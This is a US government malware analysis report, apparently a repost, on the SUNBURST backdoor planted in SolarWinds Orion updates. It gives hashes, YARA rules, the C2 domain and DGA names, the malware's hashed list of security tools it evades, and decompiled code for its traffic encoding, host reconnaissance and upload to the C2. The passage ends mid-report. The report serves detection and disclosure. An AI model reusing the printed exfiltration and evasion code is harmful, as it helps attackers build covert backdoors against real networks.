MAR-10318845-1.v1 – SUNBURST

MAR-10318845-1.v1 – SUNBURST

This article is contributed. See the original author and article here.

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Description

This report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise of SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST.

After being delivered as part of certain SolarWinds updates, a trojanized version of the “solarwinds.orion.core.businesslayer.dll” containing SUNBURST malware is installed by a legitimate SolarWinds installer application. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to execute various functions on the compromised system, as well as deploy additional payloads and exfiltrate data. The embedded SUNBURST code encrypts its outbound communications to the remote operator using XOR encryption and modified Base64 encoding. To maintain a low profile, the SUNBURST code will not run if it detects certain security software running on the target system.

For a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix.

Submitted Files (4)

019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business…)

32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business…)

ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business…)

d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H…)

Domains (1)

avsvmcloud.com

32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77

Tags

backdoorremote-access-trojantrojan

Details
Name SolarWinds.Orion.Core.BusinessLayer.dll
Size 1011032 bytes
Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 b91ce2fa41029f6955bff20079468448
SHA1 76640508b1e7759e548771a5359eaed353bf1eec
SHA256 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77
SHA512 6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e47f44cc77584bd7
ssdeep 12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD
Entropy 5.582827
Antivirus
Ahnlab Backdoor/Win32.SunBurst
Antiy Trojan[Backdoor]/MSIL.Agent
Avira TR/Sunburst.AO
BitDefender Trojan.Sunburst.A
Clamav Win.Countermeasure.Sunburst-9809152-0
Comodo Backdoor
Cyren W32/Trojan.BCCG-2955
ESET a variant of MSIL/SunBurst.A trojan
Emsisoft Trojan.Win32.Sunburst (A)
Ikarus Backdoor.Sunburst
K7 Trojan ( 00574a531 )
Lavasoft Trojan.Sunburst.A
McAfee Trojan-sunburst
Microsoft Security Essentials Trojan:MSIL/Solorigate.BR!dha
NANOAV Trojan.Win32.SunBurst.iduxjk
Sophos Mal/Sunburst-A
Symantec Backdoor.Sunburst!gen1
Systweak trojan-backdoor.sunburst-r
TrendMicro Backdoo.6F8C6A1E
TrendMicro House Call Backdoo.6F8C6A1E
Vir.IT eXplorer Trojan.Win32.SunBurst.A
VirusBlokAda TScope.Trojan.MSIL
Zillya! Backdoor.Sunburst.Win32.2
YARA Rules
  • rule CISA_10318927_01 : trojan rat SOLAR_FIRE
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10318927”
           Date = “2020-12-13”
           Last_Modified = “20201213_2145”
           Actor = “n/a”
           Category = “TROJAN RAT”
           Family = “SOLAR_FIRE”
           Description = “This signature is based off of unique strings embedded within the modified Solar Winds app”
           MD5_1 = “b91ce2fa41029f6955bff20079468448”
           SHA256_1 = “32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77”
           MD5_2 = “846e27a652a5e1bfbd0ddd38a16dc865”
           SHA256_2 = “ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6”
       strings:
           $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }
           $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }
           $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D }
           $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 }
       condition:
    all of them
    }
  • rule FireEye_20_00025668_01 : SUNBURST APT backdoor
    {
       meta:
           Author = “FireEye”
           Date = “2020-12-13”
           Last_Modified = “20201213_1917”
           Actor = “n/a”
           Category = “Backdoor”
           Family = “SUNBURST”
           Description = “This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services.”
           MD5_1 = “”
           SHA256_1 = “”
       strings:
           $cmd_regex_encoded = “U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA” wide
           $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
           $fake_orion_event_encoded = “U3ItS80rCaksSFWyUvIvyszPU9IBAA==” wide
           $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
           $fake_orion_eventmanager_encoded = “U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==” wide
           $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
           $fake_orion_message_encoded = “U/JNLS5OTE9VslKqNqhVAgA=” wide
           $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
           $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
       condition:
           $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) )
    }
  • rule FireEye_20_00025668_02 : SUNBURST APT backdoor
    {
       meta:
           Author = “FireEye”
           Date = “2020-12-13”
           Last_Modified = “20201213_1917”
           Actor = “n/a”
           Category = “Backdoor”
           Family = “SUNBURST”
           Description = “The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services.”
           MD5_1 = “”
           SHA256_1 = “”
       strings:
           $a = “0y3Kzy8BAA==” wide
           $aa = “S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA” wide
           $ab = “S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=” wide
           $ac = “C88sSs1JLS4GAA==” wide
           $ad = “C/UEAA==” wide
           $ae = “C89MSU8tKQYA” wide
           $af = “8wvwBQA=” wide
           $ag = “cyzIz8nJBwA=” wide
           $ah = “c87JL03xzc/LLMkvysxLBwA=” wide
           $ai = “88tPSS0GAA==” wide
           $aj = “C8vPKc1NLQYA” wide
           $ak = “88wrSS1KS0xOLQYA” wide
           $al = “c87PLcjPS80rKQYA” wide
           $am = “Ky7PLNAvLUjRBwA=” wide
           $an = “06vIzQEA” wide
           $b = “0y3NyyxLLSpOzIlPTgQA” wide
           $c = “001OBAA=” wide
           $d = “0y0oysxNLKqMT04EAA==” wide
           $e = “0y3JzE0tLknMLQAA” wide
           $f = “003PyU9KzAEA” wide
           $h = “0y1OTS4tSk1OBAA=” wide
           $i = “K8jO1E8uytGvNqitNqytNqrVA/IA” wide
           $j = “c8rPSQEA” wide
           $k = “c8rPSfEsSczJTAYA” wide
           $l = “c60oKUp0ys9JAQA=” wide
           $m = “c60oKUp0ys9J8SxJzMlMBgA=” wide
           $n = “8yxJzMlMBgA=” wide
           $o = “88lMzygBAA==” wide
           $p = “88lMzyjxLEnMyUwGAA==” wide
           $q = “C0pNL81JLAIA” wide
           $r = “C07NzXTKz0kBAA==” wide
           $s = “C07NzXTKz0nxLEnMyUwGAA==” wide
           $t = “yy9IzStOzCsGAA==” wide
           $u = “y8svyQcA” wide
           $v = “SytKTU3LzysBAA==” wide
           $w = “C84vLUpOdc5PSQ0oygcA” wide
           $x = “C84vLUpODU4tykwLKMoHAA==” wide
           $y = “C84vLUpO9UjMC07MKwYA” wide
           $z = “C84vLUpO9UjMC04tykwDAA==” wide
       condition:
           ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-03-24 04:52:34-04:00
Import Hash dae02f32a21e03ce65412f6e56942daa
Company Name SolarWinds Worldwide, LLC.
File Description SolarWinds.Orion.Core.BusinessLayer
Internal Name SolarWinds.Orion.Core.BusinessLayer.dll
Legal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.
Original Filename SolarWinds.Orion.Core.BusinessLayer.dll
Product Name SolarWinds.Orion.Core.BusinessLayer
Product Version 2019.4.5200.9083
PE Sections
MD5 Name Raw Size Entropy
9f1dcf8b4df81fdd1e33e8157fb58d9f header 512 2.890704
ac9dc455a67c7f2c9f10725d66c115d1 .text 1001472 5.569219
69a064c0b6001299af109ed0d06f6c6f .rsrc 1536 3.015713
275a7e1f11b8e5fefa163e47c22129b4 .reloc 512 0.101910
Relationships
32519b85c0… Connected_To avsvmcloud.com
32519b85c0… Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600
Description

This file is a 32-bit .NET DLL named “SolarWinds.Orion.Core.BusinessLayer.dll.” It is a modified SolarWinds-signed plugin component of the Orion software framework that has been patched with the SUNBURST backdoor. This malicious file was signed with a digital certificate issued by Symantec to SolarWinds. The digital certificate should be considered compromised.

–Begin Digital Certificate Information–
Signer:     CN=”Solarwinds Worldwide, LLC”, O=”Solarwinds Worldwide, LLC”, L=Austin, S=Texas, C=US
Issuer:     CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=SymantecCorporation, C=US
SN:         0FE973752022A606ADF2A36E345DC0ED
Not Before: 1/20/2020 7:00:00 PM
Not After: 1/20/2023 6:59:59 PM
Thumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4
Status:     Valid
StatusMsg: Signature verified.
–End Digital Certificate Information–

SUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below.

– Sets a 12 to 14 day delayed execution time
– Stealth
– Command and Control (C2) communication
– Collect system information
– Upload system information from the victim system
– Run specified tasks
– Terminate processes
– Download, read, write, move, delete, and execute files
– Compute file hashes
– Reboot the system
– Adjust process privileges

**DELAYED EXECUTION**
SUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins. Once installed, it compares its last write time to a randomly generated value between 288 and 336 hours (12 – 14 days) after the file was written. The malware will sleep until this calculated time frame has passed, after which, the malware will begin C2 sessions to retrieve and execute commands or “Jobs” on behalf of the adversary.

**STEALTH**
SUNBURST uses obfuscated blocklists consisting of hashed process and service names to identify analysis tools and antivirus software components running as processes, services, and drivers. It utilizes a modified version of the FNV-1a hash algorithm to determine if specific processes are running on the target system. It will enumerate and hash the process names of all running processes and compare the generated hashes to a hard-coded blocklist. If no block-listed processes are found, it will attempt to resolve the domain “api.solarwinds.com” to test for network connectivity. If a block-listed process is found, it does not proceed with its C2 session. This evasion technique is used to keep it from being detected. The hard coded hashed process names are stored in an unsigned LONG list named “assemblyTimeStamps.” See “**BLOCK LIST CHECKING FUNCTIONS**” below in this report for details.

–Begin hard-coded list of block-listed processes and names–
1475579823244607677         100-continue
2734787258623754862         accept
1368907909245890092         afwserv
16858955978146406642        apac.lab
2597124982561782591         apimonitor-x64
2600364143812063535         apimonitor-x86
6195833633417633900         aswengsrv
2934149816356927366         aswidsagent
13029357933491444455        aswidsagenta
15194901817027173566        atrsdfw.sys
4821863173800309721         autopsy
13464308873961738403        autopsy64
3320026265773918739         autoruns
12969190449276002545        autoruns64
10657751674541025650        autorunsc
12094027092655598256        autorunsc64
2760663353550280147         avastavwrapper
8146185202538899243         avastsvc
11818825521849580123        avastui
11109294216876344399        avgadminclientservice
2797129108883749491         avgidsagent
3660705254426876796         avgsvc
3890794756780010537         avgsvca
3890769468012566366         avgsvcx
12709986806548166638        avgui
14095938998438966337        avgwdsvcx
13611051401579634621        avp
18147627057830191163        avpui
16423314183614230717        bccavsvc
11913842725949116895        binaryninja
5449730069165757263         blacklight
12679195163651834776        brcow_x_x_x_x.sys
1614465773938842903         brfilter.sys
11385275378891906608        carbonblack
13693525876560827283        carbonblackk
17204844226884380288        cavp
5984963105389676759         cb
17849680105131524334        cbcomms
18246404330670877335        cbstream
292198192373389586            cff explorer
14226582801651130532        close
11266044540366291518        connection
6116246686670134098         content-type
10734127004244879770        cork.lab
18159703063075866524        crexecprev.sys
11771945869106552231        csagent
9234894663364701749         csdevicecontrol
9061219083560670602         csfalconcontainer
8698326794961817906         csfalconservice
12790084614253405985        cutter
16570804352575357627        cve.sys
17097380490166623672        cybkerneltracker.sys
16066522799090129502        date
5219431737322569038         de4dot
15535773470978271326        debugview
11073283311104541690        dev.local
3626142665768487764         dgdmk.sys
7810436520414958497         diskmon
4030236413975199654         dmz.local
13316211011159594063        dnsd
13825071784440082496        dnspy
14480775929210717493        dotpeek32
14482658293117931546        dotpeek64
8473756179280619170         dumpcap
15587050164583443069        eamonm
12718416789200275332        eaw.sys
9559632696372799208         eelam
607197993339007484            egui
14513577387099045298        eguiproxy
4931721628717906635         ehdrv
14079676299181301772        ekbdflt
3200333496547938354         ekrn
2589926981877829912         ekrnepfw
8727477769544302060         emea.sales
17939405613729073960        epfw
17997967489723066537        epfwwfp
3778500091710709090         evidence center
8799118153397725683         exeinfope
8873858923435176895         expect
13783346438774742614        f-secure filter
16112751343173365533        f-secure gatekeeper
17624147599670377042        f-secure gatekeeper handler starter
3425260965299690882         f-secure hips
16066651430762394116        f-secure network request broker
2380224015317016190         f-secure recognizer
13655261125244647696        f-secure webui daemon
12027963942392743532        fakedns
576626207276463000            fakenet
9384605490088500348         fe_avk
15092207615430402812        feelam
6274014997237900919         fekern
3320767229281015341         fewscservice
7412338704062093516         ffdec
682250828679635420            fiddler
13014156621614176974        fileinsight
18150909006539876521        floss
5587557070429522647         fnrb32
12445177985737237804        fsaua
12445232961318634374        fsaus
17017923349298346219        fsav32
9333057603143916814         fsbts
541172992193764396            fsdevcon
10393903804869831898        fsdfw
3413052607651207697         fses
3407972863931386250         fsfw
10545868833523019926        fsgk32
521157249538507889            fsgk32st
3421213182954201407         fsma
15039834196857999838        fsma32
3421197789791424393         fsms
3413886037471417852         fsni
17978774977754553159        fsorsp
14243671177281069512        fsorspclient
14055243717250701608        fssm32
7315838824213522000         fsvista
14971809093655817917        fswebuid
10336842116636872171        gdb
6943102301517884811         groundling32.sys
13544031715334011032        groundling64.sys
397780960855462669            hexisfsmonitor.sys
13260224381505715848        hiew32
12785322942775634499        hiew32demo
17956969551821596225        hollows_hunter
14256853800858727521        idaq
8709004393777297355         idaq64
8129411991672431889         idr
15514036435533858158        if-modified-since
15997665423159927228        ildasm
10829648878147112121        ilspy
9149947745824492274         jd-gui
13852439084267373191        keep-alive
17633734304611248415        ksde
13581776705111912829        ksdeui
4578480846255629462         lab.brno
8381292265993977266         lab.local
3796405623695665524         lab.na
5942282052525294911         lab.rio
17984632978012874803        libwamf.sys
3656637464651387014         lordpe
2717025511528702475         lragentmf.sys
10501212300031893463        microsoft.tri.sensor
155978580751494388            microsoft.tri.sensor.updater
5183687599225757871         msmpeng
10063651499895178962        mssense
3575761800716667678         officemalscanner
4501656691368064027         ollydbg
7701683279824397773         pci.local
10296494671777307979        pdfstreamdumper
14630721578341374856        pe-bear
6461429591783621719         pe-sieve32
6508141243778577344         pe-sieve64
4088976323439621041         pebrowse64
9531326785919727076         peid
10235971842993272939        pestudio
2478231962306073784         peview
9903758755917170407         pexplorer
14710585101020280896        ppee
2810460305047003196         procdump
13611814135072561278        procdump64
2032008861530788751         processhacker
6491986958834001955         procexp
27407921587843457             procexp64
2128122064571842954         procmon
10484659978517092504        prodiscoverbasic
2532538262737333146         psanhost
835151375515278827            psepfilter.sys
6088115528707848728         psuamain
4454255944391929578         psuaservice
8478833628889826985         py2exedecompiler
10463926208560207521        r2agent
7080175711202577138         rabin2
8697424601205169055         radare2
16130138450758310172        ramcapture
7775177810774851294         ramcapture64
700598796416086955            redcloak
9007106680104765185         referer
506634811745884560            reflector
18294908219222222902        regmon
3588624367609827560         resourcehacker
9555688264681862794         retdec-ar-extractor
5415426428750045503         retdec-bin2llvmir
3642525650883269872         retdec-bin2pat
13135068273077306806        retdec-config
3769837838875367802         retdec-fileinfo
191060519014405309            retdec-getsig
1682585410644922036         retdec-idr2pat
7878537243757499832         retdec-llvmir2hll
13799353263187722717        retdec-macho-extractor
1367627386496056834         retdec-pat2yara
12574535824074203265        retdec-stacofin
16990567851129491937        retdec-unpacker
8994091295115840290         retdec-yarac
13876356431472225791        rundotnetdll
18392881921099771407        rvsavd.sys
5132256620104998637         saas.swi
11801746708619571308        safe-agent.sys
14968320160131875803        sbiesvc
14868920869169964081        scdbg
106672141413120087            scylla_x64
79089792725215063             scylla_x86
16335643316870329598        sense
12343334044036541897        sentinelmonitor.sys
5614586596107908838         shellcode_launcher
17291806236368054941        solarwinds.businesslayerhost
3869935012404164040         solarwindsdiagnostics
15267980678929160412        swdev.dmz
1109067043404435916         swdev.local
14111374107076822891        sysmon
3538022140597504361         sysmon64
7175363135479931834         tanium
3178468437029279937         taniumclient
13599785766252827703        taniumdetectengine
6180361713414290679         taniumendpointindex
8612208440357175863         taniumtracecli
8408095252303317471         taniumtracewebsocketclient64
7982848972385914508         task explorer
8760312338504300643         task explorer-64
17351543633914244545        tcpdump
7516148236133302073         tcpvcon
15114163911481793350        tcpview
7574774749059321801         user-agent
15457732070353984570        vboxservice
16292685861617888592        win32_remote
10374841591685794123        win64_remotex64
3045986759481489935         windbg
917638920165491138            windefend
17109238199226571972        windump
5945487981219695001         winhex
6827032273910657891         winhex64
8052533790968282297         winobj
17574002783607647274        wireshark
3341747963119755850         x32dbg
14193859431895170587        x64dbg
15695338751700748390        xagt
640589622539783622            xagtnotif
17683972236092287897        xwforensics
17439059603042731363        xwforensics64
–End hard-coded list of block-listed processes and names–

**COMMAND AND CONTROL**
During runtime, SUNBURST hashes its own parent process name, and compares it to the value 17291806236368054941. If it does not match, the malicious class “OrionImprovementBusinessLayer” will stop executing and the DLL will continue normal activity.

When communicating with its C2, SUNBURST utilizes the Orion Improvement Program (OIP) protocol to disguise network activity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated “customer ID” that allows the adversary to track different compromised systems.

To establish C2, it will construct and resolve the subdomains of “avsvmcloud.com” using a domain generation algorithm (DGA). The following format is used to generate the domain name:

–Begin format of the domain name–
.appsync-api.eu-west-1.avsvmcloud.com
.appsync-api.us-west-2.avsvmcloud.com
.appsync-api.us-east-1.avsvmcloud.com
.appsync-api.us-east-2.avsvmcloud.com
–End format of the domain name–

It will attempt to make a Canonical Name (CNAME) query according to different third-level domain names in combination with the DGA to verify the C2 server is accessible before executing its command control session.

–Begin domain names combined with DGA–
6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com
7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com
gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com
ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com
k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com
mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com
–End domain names plus DGA–

Outbound communications are encrypted using an embedded class named “CryptoHelper.” The class contains two functions named “CreateSecureString” and “Base64Encode.” The function “CreateSecureString” creates a random byte and then utilizes this random byte to encode the string provided. The randomly generated byte, used as the XOR key, will be stored at offset 0x00 of the encoded string — allowing the adversary to decrypt the traffic received from this implant. The function “CreateSecureString” takes two arguments, a byte array which will be the data targeted for encryption and a bool variable. If this variable is set to “true” the function will “OR” the generated “XOR” key byte with the value 128 before using it to XOR encode the provided data. It then calls the Base64Encode function to further obfuscate the communication.

–Begin CreateSecureString Function–
private static string CreateSecureString(byte[] data, bool flag)
       {
           byte[] bytes = new byte[data.Length + 1];
           bytes[0] = (byte)new Random().Next(1, (int)sbyte.MaxValue);
           if (flag)
               bytes[0] |= (byte)128;
           for (int index = 1; index < bytes.Length; ++index)
               bytes[index] = (byte)((uint)data[index – 1] ^ (uint)bytes[0]);
           return Base64Encode(bytes, true);
       }
–End CreateSecureString Function–

The Base64Encode function is a modified version of the Base64 algorithm that uses the custom alphabet, “ph2eifo3n5utg1j8d94qrvbmk0sal76c.” This custom Base64 encoding makes it harder to interpret network traffic sent between this malicious implant and the remote C2 server. The custom Base64 alphabet and algorithm utilized would be required to decode the network traffic.

–Begin Base64Encode Function–
private static string Base64Encode(byte[] bytes, bool rt)
    {
       string str1 = OrionImprovementBusinessLayer.ZipHelper.Unzip(“K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==”);
       string str2 = “”;
       uint num1 = 0;
       int num2 = 0;
       foreach (byte num3 in bytes)
       {
        num1 |= (uint) num3 << num2;
        for (num2 += 8; num2 >= 5; num2 -= 5)
        {
           str2 += str1[(int) num1 & 31].ToString();
           num1 >>= 5;
        }
       }
       if (num2 > 0)
       {
        if (rt)
           num1 |= (uint) (new Random().Next() << num2);
        str2 += str1[(int) num1 & 31].ToString();
       }
       return str2;
    }
–End Base64Encode Function–

**COLLECT SYSTEM INFORMATION**
The collection of system description info is carried out by the CollectSystemDescription function.
It will collect the following information:

Victim domain SID
Domain name
Hostname
Username
Operating System (OS) version
System directory
Environment tick count – the time since the system was last rebooted.

public static void CollectSystemDescription(string info, out string result)
{
result = (string) null;
int i = 0;
string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
domainName;
try
{
string str = ((SecurityIdentifier) new NTAccount(domainName,
OrionImprovementBusinessLayer.ZipHelper.Unzip(Administrator)).Translate(typeof
(SecurityIdentifier))).AccountDomainSid.ToString();
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
str;
}
catch
{
result += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i);
}
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
IPGlobalProperties.GetIPGlobalProperties().HostName;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
Environment.UserName;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
OrionImprovementBusinessLayer.GetOSVersion(true);
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
Environment.SystemDirectory;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
(object) (int) TimeSpan.FromMilliseconds((double) (uint)
Environment.TickCount).TotalDays;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info
+ “n”;
result += OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration();
}

The GetNetworkAdapterConfiguration function will gather information on any attached network adapters and their configuration information.

private static string GetNetworkAdapterConfiguration()
{
string str = “”;
try
{
using (ManagementObjectSearcher managementObjectSearcher = new
ManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(Select *
From Win32_NetworkAdapterConfiguration where IPEnabled=true)))
{
foreach (ManagementObject managementObject in
managementObjectSearcher.Get().Cast<ManagementObject>())
{
str += “n”;
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(Description));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(MACAddress));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPEnabled));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPServer));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSHostName));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSDomainSuffixSearchOrder));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSServerSearchOrder));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(IPAddress));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(IPSubnet));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DefaultIPGateway));
}
return str;
}
}
catch (Exception ex)
{
return str + ex.Message;
}

**UPLOAD SYSTEM INFORMATION**
The “UploadSystemDescription” function is used to exfiltrate gathered system information. It parses through HTTP session information to form a full HTTP request that is sent to the remote C2 server. The modified version of the FNV-1a hash algorithm is utilized to hash certain words associated with outbound HTTP requests, such as “accept” (Hash: 2734787258623754862) and “content-type” (Hash: 6116246686670134098). It then parses through the provided HTTP session data using these hash values, rather than HTTP strings, to obfuscate the functionality of this code. This obfuscation makes it more difficult to manually or heuristically identify the functions intent to generate an outbound HTTP session.

–Begin UploadSystemDescription Function–
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
    {
       result = (string) null;
       string requestUriString = args[0];
       string s1 = args[1];
       string s2 = args.Length &gt;= 3 ? args[2] : (string) null;
       string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3]
       {
        “rn”,
        “r”,
        “n”
       }, StringSplitOptions.None);
       HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString);
       HttpWebRequest httpWebRequest2 = httpWebRequest1;
       httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback() + (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) =&gt; true));
       httpWebRequest1.Proxy = proxy;
       httpWebRequest1.Timeout = 120000;
       httpWebRequest1.Method = strArray[0].Split(‘ ‘)[0];
       foreach (string header in strArray)
       {
        int length = header.IndexOf(‘:’);
        if (length &gt; 0)
        {
           string headerName = header.Substring(0, length);
           string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty&lt;char&gt;());
           if (!WebHeaderCollection.IsRestricted(headerName))
           {
            httpWebRequest1.Headers.Add(header);
           }
           else
           {
            switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower()))
            {
               case 2734787258623754862:
                httpWebRequest1.Accept = s3;
                continue;
               case 6116246686670134098:
                httpWebRequest1.ContentType = s3;
                continue;
               case 7574774749059321801:
                httpWebRequest1.UserAgent = s3;
                continue;
               case 8873858923435176895:
                if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL)
                {
                   httpWebRequest1.ServicePoint.Expect100Continue = true;
                   continue;
                }
                httpWebRequest1.Expect = s3;
                continue;
               case 9007106680104765185:
                httpWebRequest1.Referer = s3;
                continue;
               case 11266044540366291518:
                ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower());
                httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive;
                httpWebRequest1.KeepAlive = hash != 14226582801651130532UL &amp;&amp; httpWebRequest1.KeepAlive;
                continue;
               case 15514036435533858158:
                httpWebRequest1.set_Date(DateTime.Parse(s3));
                continue;
               case 16066522799090129502:
                httpWebRequest1.set_Date(DateTime.Parse(s3));
                continue;
               default:
                continue;
            }
–End UploadSystemDescription Function–

SUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file hashes, and reboot the victim system.

**RUN SPECIFIED TASKS**
